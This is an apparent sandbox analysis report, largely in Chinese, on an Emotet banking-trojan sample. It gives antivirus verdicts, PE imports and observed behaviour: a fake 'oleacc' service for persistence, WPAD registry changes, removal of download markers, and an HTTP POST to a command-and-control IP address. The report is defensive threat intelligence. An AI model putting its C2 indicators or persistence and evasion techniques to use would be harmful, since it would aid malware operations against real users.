12.0
0-day
55 个模型检测该样本为恶意!
重新分析
更多

b6c7c65fcf04c8cbc8b9be5e4e6cc6948239df9bacd6230d5a22a341e5066c9d

06fb066315549dc4b6b4ca8b56400a02.exe

分析耗时

114s

最近分析

文件大小

252.0KB
静态报毒 动态报毒 100% 243UYK67HXLUZT7EYBIDJG AI SCORE=100 CONFIDENCE EMOTET GCWR GDDZ GENERIC@ML GENERICKD HIGH CONFIDENCE HTXHXB MALWARE@#WG4HASZLOMWN MALWAREX R350021 RDML SCORE SUSGEN TIOIBELD TROJANBANKER UDGP UNSAFE XGNRS 更多
鹰眼引擎
未检测 暂无鹰眼引擎检测结果
静态判定
反病毒引擎
查杀引擎 查杀结果 查杀时间 查杀版本
McAfee Emotet-FRZ!06FB06631554 20201119 6.0.6.653
Alibaba Trojan:Win32/Emotet.3ed654b6 20190527 0.3.0.5
CrowdStrike win/malicious_confidence_100% (W) 20190702 1.0
Baidu 20190318 1.0.0.2
Avast Win32:MalwareX-gen [Trj] 20201119 20.10.5736.0
Tencent Win32.Trojan-banker.Emotet.Hzf 20201119 1.0.0.1
Kingsoft 20201119 2017.9.26.565
静态指标
Queries for the computername (1 个事件)
Time & API Arguments Status Return Repeated
1619161468.440375
GetComputerNameA
computer_name: OSKAR-PC
success 1 0
Uses Windows APIs to generate a cryptographic key (6 个事件)
Time & API Arguments Status Return Repeated
1619161459.002375
CryptGenKey
crypto_handle: 0x026b0f78
algorithm_identifier: 0x0000660e ()
provider_handle: 0x026b0a58
flags: 1
key: f×ÊÿwMÚ=¸Éï™xIã¢
success 1 0
1619161468.471375
CryptExportKey
crypto_handle: 0x026b0f78
crypto_export_handle: 0x026b0e20
buffer: f¤ÉjõSÎÔ$a§þ­š»ùb Ü"/†´Ïn’‰_š{;žhUsê +WĎcýo&‰yY´É¸³NWš²Dô…N! …c÷§+RëVì*–ÙÙí=Ïރeò¬úxva
blob_type: 1
flags: 64
success 1 0
1619161504.112375
CryptExportKey
crypto_handle: 0x026b0f78
crypto_export_handle: 0x026b0e20
buffer: f¤Ï¿>ŠvÞÓ+i eà_>ÕÃÇùÇ|ÓÞÚ³·÷†Vv²Ñ 'âChí†!kŠ,À¡¥ˆV‘VÆ " –">N2)d+J§íÑ·àã dx.å¤ÈÿuƒûRÙù ¾
blob_type: 1
flags: 64
success 1 0
1619161508.768375
CryptExportKey
crypto_handle: 0x026b0f78
crypto_export_handle: 0x026b0e20
buffer: f¤Žq>ǽw®˜t• q¶X9 BøYa<•®z:Vmâ»Mà„š!Ôù¨dEËô›M _ÙXåà¾A8¨¦‰q„Ûª'aK30Cb?Οµ¾ ðªa+÷¡n¯ýx ³ëiÂ
blob_type: 1
flags: 64
success 1 0
1619161513.987375
CryptExportKey
crypto_handle: 0x026b0f78
crypto_export_handle: 0x026b0e20
buffer: f¤pKMd"2‡+ƒýƒ|‡ƒì6Í°Y1fvôö•­ YÛÛ —íxJæ›×‚'Œ¼p+ã7t÷­¶x¯Æ7¥/öuÔÀ6š™Þ_Z†úŸlCè¨S™
blob_type: 1
flags: 64
success 1 0
1619161530.174375
CryptExportKey
crypto_handle: 0x026b0f78
crypto_export_handle: 0x026b0e20
buffer: f¤_&ºc÷”­ ¶@á5èmÊ@(n¾²¯ Žÿ¡±GÚ+>ýü‡ÐàPK1˜ß ̙dÁ„q(á®h7'ŸY¤(âÀÉI‘RίKæ>‹Ï‚ƒ+›‚ºÐlQiҖ'7
blob_type: 1
flags: 64
success 1 0
The executable uses a known packer (1 个事件)
packer Armadillo v1.71
The file contains an unknown PE resource name possibly indicative of a packer (1 个事件)
resource name None
行为判定
动态指标
HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 个事件)
suspicious_features POST method with no referer header, Connection to IP address suspicious_request POST http://46.32.229.152:8080/oUAgL6FGx/gbqFgBlGMhnz/HvyWVhGB3/ZRTURoWMnogn/
Performs some HTTP requests (1 个事件)
request POST http://46.32.229.152:8080/oUAgL6FGx/gbqFgBlGMhnz/HvyWVhGB3/ZRTURoWMnogn/
Sends data using the HTTP POST Method (1 个事件)
request POST http://46.32.229.152:8080/oUAgL6FGx/gbqFgBlGMhnz/HvyWVhGB3/ZRTURoWMnogn/
Allocates read-write-execute memory (usually to unpack itself) (5 个事件)
Time & API Arguments Status Return Repeated
1619134516.385662
NtAllocateVirtualMemory
process_identifier: 368
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x01f20000
success 0 0
1619134516.448662
NtAllocateVirtualMemory
process_identifier: 368
region_size: 36864
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x01f50000
success 0 0
1619161102.271521
NtAllocateVirtualMemory
process_identifier: 1424
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffffffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x0000000004120000
success 0 0
1619161458.565375
NtAllocateVirtualMemory
process_identifier: 3068
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x00720000
success 0 0
1619161458.580375
NtAllocateVirtualMemory
process_identifier: 3068
region_size: 36864
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x01f60000
success 0 0
Checks whether any human activity is being performed by constantly checking whether the foreground window changed
Drops a binary and executes it (1 个事件)
file C:\Windows\SysWOW64\DDACLSys\oleacc.exe
Moves the original executable to a new location (1 个事件)
Time & API Arguments Status Return Repeated
1619134517.541662
MoveFileWithProgressW
oldfilepath: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\06fb066315549dc4b6b4ca8b56400a02.exe
newfilepath: C:\Windows\SysWOW64\DDACLSys\oleacc.exe
newfilepath_r: C:\Windows\SysWOW64\DDACLSys\oleacc.exe
flags: 3
oldfilepath_r: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\06fb066315549dc4b6b4ca8b56400a02.exe
success 1 0
Checks adapter addresses which can be used to detect virtual network interfaces (1 个事件)
Time & API Arguments Status Return Repeated
1619161469.033375
GetAdaptersAddresses
flags: 0
family: 0
failed 111 0
Expresses interest in specific running processes (1 个事件)
process oleacc.exe
Reads the systems User Agent and subsequently performs requests (1 个事件)
Time & API Arguments Status Return Repeated
1619161468.596375
InternetOpenW
proxy_bypass:
access_type: 0
proxy_name:
flags: 0
user_agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
success 13369348 0
网络通信
Communicates with host for which no DNS query was performed (6 个事件)
host 118.110.236.121
host 149.202.5.139
host 153.92.4.96
host 172.217.24.14
host 46.32.229.152
host 51.75.163.68
Installs itself for autorun at Windows startup (1 个事件)
service_name oleacc service_path C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\"C:\Windows\SysWOW64\DDACLSys\oleacc.exe"
Created a service where a service was also not started (1 个事件)
Time & API Arguments Status Return Repeated
1619134517.854662
CreateServiceW
service_start_name:
start_type: 2
service_handle: 0x02a5ab00
display_name: oleacc
error_control: 0
service_name: oleacc
filepath: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\"C:\Windows\SysWOW64\DDACLSys\oleacc.exe"
filepath_r: "C:\Windows\SysWOW64\DDACLSys\oleacc.exe"
service_manager_handle: 0x02a62d38
desired_access: 2
service_type: 16
password:
success 44411648 0
Deletes executed files from disk (1 个事件)
file C:\Windows\SysWOW64\DDACLSys\oleacc.exe
Sets or modifies WPAD proxy autoconfiguration file for traffic interception (8 个事件)
Time & API Arguments Status Return Repeated
1619161471.612375
RegSetValueExA
key_handle: 0x000003b4
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionReason
success 0 0
1619161471.612375
RegSetValueExA
key_handle: 0x000003b4
value: °„Ÿ×7×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionTime
success 0 0
1619161471.612375
RegSetValueExA
key_handle: 0x000003b4
value: 3
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecision
success 0 0
1619161471.612375
RegSetValueExW
key_handle: 0x000003b4
value: 网络 2
regkey_r: WpadNetworkName
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadNetworkName
success 0 0
1619161471.612375
RegSetValueExA
key_handle: 0x000003cc
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionReason
success 0 0
1619161471.612375
RegSetValueExA
key_handle: 0x000003cc
value: °„Ÿ×7×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionTime
success 0 0
1619161471.612375
RegSetValueExA
key_handle: 0x000003cc
value: 3
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecision
success 0 0
1619161471.627375
RegSetValueExW
key_handle: 0x000003b0
value: {40112ABE-63B3-43C3-BE93-1440EE3AF106}
regkey_r: WpadLastNetwork
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadLastNetwork
success 0 0
Attempts to remove evidence of file being downloaded from the Internet (1 个事件)
file C:\Windows\SysWOW64\DDACLSys\oleacc.exe:Zone.Identifier
Generates some ICMP traffic
File has been identified by 55 AntiVirus engines on VirusTotal as malicious (50 out of 55 个事件)
Elastic malicious (high confidence)
MicroWorld-eScan Trojan.GenericKD.34470269
FireEye Trojan.GenericKD.34470269
CAT-QuickHeal Trojan.Emotet
McAfee Emotet-FRZ!06FB06631554
Cylance Unsafe
Zillya Trojan.Emotet.Win32.28262
AegisLab Trojan.Win32.Emotet.L!c
K7AntiVirus Trojan ( 005600261 )
Alibaba Trojan:Win32/Emotet.3ed654b6
K7GW Trojan ( 005600261 )
CrowdStrike win/malicious_confidence_100% (W)
Arcabit Trojan.Generic.D20DF97D
TrendMicro TrojanSpy.Win32.EMOTET.TIOIBELD
Cyren W32/Trojan.UDGP-0753
Symantec Trojan.Emotet
TrendMicro-HouseCall TrojanSpy.Win32.EMOTET.TIOIBELD
Paloalto generic.ml
Kaspersky Trojan-Banker.Win32.Emotet.gddz
BitDefender Trojan.GenericKD.34470269
NANO-Antivirus Trojan.Win32.Emotet.htxhxb
Avast Win32:MalwareX-gen [Trj]
Tencent Win32.Trojan-banker.Emotet.Hzf
Ad-Aware Trojan.GenericKD.34470269
Emsisoft Trojan.GenericKD.34470269 (B)
Comodo Malware@#wg4haszlomwn
F-Secure Trojan.TR/AD.Emotet.xgnrs
DrWeb Trojan.Emotet.1007
VIPRE Trojan.Win32.Generic!BT
Invincea Mal/Generic-S
McAfee-GW-Edition BehavesLike.Win32.Emotet.dh
Sophos Mal/Generic-S
APEX Malicious
Jiangmin Trojan.Banker.Emotet.oxk
Webroot W32.Trojan.Emotet
Avira TR/AD.Emotet.xgnrs
MAX malware (ai score=100)
Antiy-AVL Trojan[Banker]/Win32.Emotet
Gridinsoft Trojan.Win32.Emotet.oa
Microsoft Trojan:Win32/Emotet.CA!MTB
ZoneAlarm Trojan-Banker.Win32.Emotet.gddz
GData Trojan.GenericKD.34470269
Cynet Malicious (score: 100)
AhnLab-V3 Trojan/Win32.Emotet.R350021
VBA32 TrojanBanker.Emotet
ALYac Trojan.Agent.Emotet
Malwarebytes Trojan.Emotet
Ikarus Trojan-Banker.Emotet
ESET-NOD32 Win32/Emotet.CD
Rising Trojan.Generic@ML.85 (RDML:243Uyk67HxLuzT7eYbidJg)
Connects to IP addresses that are no longer responding to requests (legitimate services will remain up-and-running usually) (6 个事件)
dead_host 149.202.5.139:443
dead_host 51.75.163.68:7080
dead_host 153.92.4.96:8080
dead_host 192.168.56.101:49188
dead_host 192.168.56.101:49187
dead_host 118.110.236.121:8080
可视化分析
二进制图像
暂无二进制图像 该样本未生成二进制可视化图像
运行截图
暂无运行截图 该样本运行过程中未生成截图

👋 欢迎使用 ChatHawk

我是您的恶意软件分析助手,可以帮您分析和解读恶意软件报告。请随时向我提问!

🔍 主要威胁分析
⚡ 行为特征
🛡️ 防护建议
🔧 技术手段
🎯 检测方法
🤖

PE Compile Time

2020-09-02 02:20:23

Imports

Library KERNEL32.dll:
0x41a080 GlobalReAlloc
0x41a084 TlsSetValue
0x41a088 LocalReAlloc
0x41a08c TlsGetValue
0x41a090 GlobalFlags
0x41a098 GetProcessVersion
0x41a09c GetCPInfo
0x41a0a0 GetOEMCP
0x41a0ac RtlUnwind
0x41a0b0 HeapAlloc
0x41a0b8 GetStartupInfoA
0x41a0bc GetCommandLineA
0x41a0c0 ExitProcess
0x41a0c4 HeapFree
0x41a0c8 TerminateProcess
0x41a0cc RaiseException
0x41a0d0 HeapReAlloc
0x41a0d4 HeapSize
0x41a0dc HeapDestroy
0x41a0e0 TlsFree
0x41a0e4 VirtualFree
0x41a0e8 IsBadWritePtr
0x41a100 SetHandleCount
0x41a104 GetStdHandle
0x41a108 GetFileType
0x41a10c LCMapStringA
0x41a110 LCMapStringW
0x41a118 GetStringTypeA
0x41a11c GetStringTypeW
0x41a120 IsBadReadPtr
0x41a124 IsBadCodePtr
0x41a128 SetStdHandle
0x41a12c CompareStringA
0x41a130 CompareStringW
0x41a138 GlobalHandle
0x41a13c TlsAlloc
0x41a140 LocalAlloc
0x41a154 SetErrorMode
0x41a158 GetFileTime
0x41a15c GetFileSize
0x41a160 GetFileAttributesA
0x41a164 MulDiv
0x41a168 SetLastError
0x41a16c LocalFree
0x41a170 FreeLibrary
0x41a174 GetVersion
0x41a178 lstrcatA
0x41a17c GlobalGetAtomNameA
0x41a180 GlobalAddAtomA
0x41a184 GlobalFindAtomA
0x41a188 GetModuleHandleA
0x41a18c GlobalUnlock
0x41a190 GlobalFree
0x41a194 LockResource
0x41a198 FindResourceA
0x41a19c LoadResource
0x41a1a0 GlobalLock
0x41a1a4 GlobalAlloc
0x41a1a8 GlobalDeleteAtom
0x41a1ac lstrcmpA
0x41a1b0 GetCurrentThread
0x41a1b4 GetCurrentThreadId
0x41a1c0 GetModuleFileNameA
0x41a1c4 MultiByteToWideChar
0x41a1c8 lstrcmpiA
0x41a1cc GetFullPathNameA
0x41a1d0 lstrcpynA
0x41a1d8 FindFirstFileA
0x41a1dc FindClose
0x41a1e0 lstrcpyA
0x41a1e4 lstrlenA
0x41a1e8 LoadLibraryA
0x41a1ec SetEndOfFile
0x41a1f0 UnlockFile
0x41a1f4 LockFile
0x41a1f8 CloseHandle
0x41a1fc FlushFileBuffers
0x41a200 SetFilePointer
0x41a204 WriteFile
0x41a208 ReadFile
0x41a20c CreateFileA
0x41a210 GetCurrentProcess
0x41a214 DuplicateHandle
0x41a218 GetLastError
0x41a21c VirtualAlloc
0x41a224 IsValidCodePage
0x41a228 GetACP
0x41a22c LoadLibraryW
0x41a230 GetProcAddress
0x41a234 WideCharToMultiByte
0x41a238 HeapCreate
Library USER32.dll:
0x41a240 CopyRect
0x41a244 AdjustWindowRectEx
0x41a248 SetFocus
0x41a24c GetSysColor
0x41a250 MapWindowPoints
0x41a254 SendDlgItemMessageA
0x41a258 UpdateWindow
0x41a25c IsDialogMessageA
0x41a260 SetWindowTextA
0x41a264 ShowWindow
0x41a268 wvsprintfA
0x41a26c LoadStringA
0x41a270 DestroyMenu
0x41a274 ClientToScreen
0x41a278 GetDC
0x41a27c ReleaseDC
0x41a280 BeginPaint
0x41a284 EndPaint
0x41a288 TabbedTextOutA
0x41a28c DrawTextA
0x41a290 GrayStringA
0x41a294 LoadCursorA
0x41a298 GetClassNameA
0x41a29c PtInRect
0x41a2a0 GetSysColorBrush
0x41a2a4 WinHelpA
0x41a2a8 GetClassInfoA
0x41a2ac GetMenu
0x41a2b0 GetMenuItemCount
0x41a2b4 GetSubMenu
0x41a2b8 GetMenuItemID
0x41a2c0 GetWindowTextA
0x41a2c4 GetDlgCtrlID
0x41a2c8 DefWindowProcA
0x41a2cc CreateWindowExA
0x41a2d0 GetClassLongA
0x41a2d4 SetPropA
0x41a2d8 UnhookWindowsHookEx
0x41a2dc GetPropA
0x41a2e0 CallWindowProcA
0x41a2e4 RemovePropA
0x41a2e8 GetMessageTime
0x41a2ec GetMessagePos
0x41a2f0 GetForegroundWindow
0x41a2f4 SetForegroundWindow
0x41a2f8 GetWindow
0x41a2fc SetWindowLongA
0x41a300 SetWindowPos
0x41a30c GetWindowPlacement
0x41a310 GetWindowRect
0x41a314 EndDialog
0x41a318 IsWindow
0x41a320 DestroyWindow
0x41a324 GetDlgItem
0x41a32c LoadBitmapA
0x41a330 GetMenuState
0x41a334 ModifyMenuA
0x41a338 SetMenuItemBitmaps
0x41a33c CheckMenuItem
0x41a340 EnableMenuItem
0x41a344 GetFocus
0x41a348 GetNextDlgTabItem
0x41a34c GetMessageA
0x41a350 TranslateMessage
0x41a354 DispatchMessageA
0x41a358 GetActiveWindow
0x41a35c GetKeyState
0x41a360 CallNextHookEx
0x41a364 ValidateRect
0x41a368 IsWindowVisible
0x41a36c PeekMessageA
0x41a370 GetCursorPos
0x41a374 SetWindowsHookExA
0x41a378 GetParent
0x41a37c GetLastActivePopup
0x41a380 IsWindowEnabled
0x41a384 GetWindowLongA
0x41a388 MessageBoxA
0x41a38c SetCursor
0x41a390 PostQuitMessage
0x41a394 PostMessageA
0x41a398 CharUpperA
0x41a39c wsprintfA
0x41a3a0 EnableWindow
0x41a3a4 GetTopWindow
0x41a3a8 RegisterClassA
0x41a3ac GetCapture
0x41a3b0 IsIconic
0x41a3b4 GetSystemMetrics
0x41a3b8 GetClientRect
0x41a3bc DrawIcon
0x41a3c0 GetSystemMenu
0x41a3c4 AppendMenuA
0x41a3c8 SendMessageA
0x41a3cc LoadIconA
0x41a3d0 SetActiveWindow
0x41a3d4 UnregisterClassA
Library GDI32.dll:
0x41a01c GetStockObject
0x41a020 SetMapMode
0x41a024 SetViewportOrgEx
0x41a028 OffsetViewportOrgEx
0x41a02c SetViewportExtEx
0x41a030 ScaleViewportExtEx
0x41a034 SetWindowExtEx
0x41a038 ScaleWindowExtEx
0x41a03c SelectObject
0x41a040 DeleteObject
0x41a044 GetDeviceCaps
0x41a048 PtVisible
0x41a04c RectVisible
0x41a050 TextOutA
0x41a054 ExtTextOutA
0x41a058 Escape
0x41a05c SaveDC
0x41a060 RestoreDC
0x41a064 DeleteDC
0x41a068 GetObjectA
0x41a06c SetBkColor
0x41a070 SetTextColor
0x41a074 GetClipBox
0x41a078 CreateBitmap
Library comdlg32.dll:
0x41a3ec GetSaveFileNameA
0x41a3f0 GetFileTitleA
0x41a3f4 GetOpenFileNameA
Library WINSPOOL.DRV:
0x41a3dc OpenPrinterA
0x41a3e0 DocumentPropertiesA
0x41a3e4 ClosePrinter
Library ADVAPI32.dll:
0x41a000 RegSetValueExA
0x41a004 RegOpenKeyExA
0x41a008 RegCreateKeyExA
0x41a00c RegCloseKey
Library COMCTL32.dll:
0x41a014

Hosts

No hosts contacted.

TCP

Source Source Port Destination Destination Port
192.168.56.101 49190 46.32.229.152 8080

UDP

Source Source Port Destination Destination Port
192.168.56.101 49235 114.114.114.114 53
192.168.56.101 50534 114.114.114.114 53
192.168.56.101 56539 114.114.114.114 53
192.168.56.101 65004 114.114.114.114 53
192.168.56.101 137 192.168.56.255 137
192.168.56.101 138 192.168.56.255 138
192.168.56.101 51378 224.0.0.252 5355
192.168.56.101 51808 224.0.0.252 5355
192.168.56.101 55368 224.0.0.252 5355
192.168.56.101 56804 224.0.0.252 5355
192.168.56.101 60123 224.0.0.252 5355
192.168.56.101 62191 224.0.0.252 5355
192.168.56.101 1900 239.255.255.250 1900
192.168.56.101 50535 239.255.255.250 3702
192.168.56.101 50537 239.255.255.250 3702
192.168.56.101 56807 239.255.255.250 1900
192.168.56.101 58707 239.255.255.250 3702
192.168.56.101 62192 239.255.255.250 3702

HTTP & HTTPS Requests

URI Data
http://46.32.229.152:8080/oUAgL6FGx/gbqFgBlGMhnz/HvyWVhGB3/ZRTURoWMnogn/ 
POST /oUAgL6FGx/gbqFgBlGMhnz/HvyWVhGB3/ZRTURoWMnogn/ HTTP/1.1
Content-Type: multipart/form-data; boundary=-------------------------37468c4455dab45860cdb29d2a982621
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 46.32.229.152:8080
Content-Length: 4532
Connection: Keep-Alive
Cache-Control: no-cache

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Sorry! No dropped files.
Sorry! No dropped buffers.